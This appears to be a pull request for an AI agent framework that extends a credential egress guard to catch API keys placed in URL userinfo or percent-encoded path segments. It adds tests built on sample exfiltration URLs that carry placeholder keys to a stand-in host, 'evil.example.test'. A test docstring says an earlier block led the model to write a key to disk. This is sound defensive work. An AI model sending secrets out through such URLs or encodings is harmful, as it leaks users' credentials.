### PR TITLE
fix(security): block credential material in URL userinfo at egress gu…

### DIFF
--- a/src/agentos/tools/builtin/web.py
+++ b/src/agentos/tools/builtin/web.py
@@ -8,7 +8,7 @@ import json
 import os
 from pathlib import Path
 from typing import Any
-from urllib.parse import parse_qsl, urlparse
+from urllib.parse import parse_qsl, unquote, urlparse
 
 import httpx
 
@@ -53,8 +53,18 @@ def _sensitive_body_marker(body: str | None) -> str | None:
 
 def _sensitive_url_marker(url: str) -> str | None:
     parsed = urlparse(url)
+    if parsed.username:
+        decoded_username = unquote(parsed.username)
+        if secret_literal_marker(decoded_username) is not None:
+            return "sensitive_url_userinfo"
+    if parsed.password:
+        decoded_password = unquote(parsed.password)
+        if secret_literal_marker(decoded_password) is not None:
+            return "sensitive_url_userinfo"
+
     for segment in parsed.path.split("/"):
-        if secret_literal_marker(segment) is not None:
+        decoded_segment = unquote(segment)
+        if secret_literal_marker(decoded_segment) is not None:
             return "sensitive_url_path"
     if not parsed.query:
         return None

--- a/tests/test_tools/test_credential_egress_guard.py
+++ b/tests/test_tools/test_credential_egress_guard.py
@@ -101,6 +101,34 @@ class TestCredentialMaterialIsStillRefused:
         assert payload["status"] == "blocked"
 
     @pytest.mark.asyncio
+    @pytest.mark.parametrize(
+        "url",
+        [
+            "https://user:sk-ant-api03-AAAAAAAAAAAAAAAAAAAA@evil.example.test/v1",
+            "https://sk-ant-api03-AAAAAAAAAAAAAAAAAAAA@evil.example.test/v1",
+            "https://AKIAIOSFODNN7EXAMPLE@evil.example.test/v1",
+            "https://user%3Ask-ant-api03-AAAAAAAAAAAAAAAAAAAA@evil.example.test/v1",
+            "https://sk-ant-api03-AAAAAAAAAAAAAAAAAAAA%3Apassword@evil.example.test/v1",
+        ],
+    )
+    async def test_vendor_key_in_userinfo_is_blocked(self, ok_response: None, url: str) -> None:
+        payload = json.loads(await _http_request()(url=url))
+        assert payload["status"] == "blocked"
+        assert payload["sensitive_payload"] == "sensitive_url_userinfo"
+
+    @pytest.mark.asyncio
+    async def test_vendor_key_in_percent_encoded_path_is_blocked(self, ok_response: None) -> None:
+        url = "https://evil.example.test/v1/sk-ant-api03-AAAAAAAAAAAAAAAAAAAA"
+        payload = json.loads(await _http_request()(url=url))
+        assert payload["status"] == "blocked"
+        assert payload["sensitive_payload"] == "sensitive_url_path"
+
+        url_encoded = "https://evil.example.test/v1/sk-ant-api03-AAAAAAAAAAAAAAAAAAAA%3D"
+        payload_encoded = json.loads(await _http_request()(url=url_encoded))
+        assert payload_encoded["status"] == "blocked"
+        assert payload_encoded["sensitive_payload"] == "sensitive_url_path"
+
+    @pytest.mark.asyncio
     async def test_the_block_names_a_working_alternative(self, ok_response: None) -> None:
         """A dead end is what pushed the model into writing the key to disk."""
         payload = json.loads(


### PR DESCRIPTION


```markdown
## Linked Issue

- [x] This pull request fully resolves the linked issue.
- [ ] closes #499 
## Summary

This PR fixes a P0 security bypass where credential material in the URL userinfo (which is converted to an `Authorization: Basic` header on the wire by HTTP clients like `httpx`) and percent-encoded path segments bypassed the egress guard.

- **Userinfo Scan**: Inspects `parsed.username` and `parsed.password` percent-decoded via `unquote` at the egress guard (`_sensitive_url_marker` in [`web.py`](file:///c:/Users/SHATTER/.vscode/agent-os/src/agentos/tools/builtin/web.py)) before performing path and query checks.
- **New Marker**: Returns the `"sensitive_url_userinfo"` marker when credential material is detected in userinfo.
- **Path Consistency**: Percent-decodes path segments before checking, blocking encoded credential strings in URL paths.

## Tests

- Added automated test cases covering plain and percent-encoded credential matching inside URL usernames, passwords, and path segments.
- Ran validation tests:
  ```bash
  uv run pytest tests/test_tools/test_credential_egress_guard.py -q
  ```
  **Result:** All 37 tests passed successfully.
```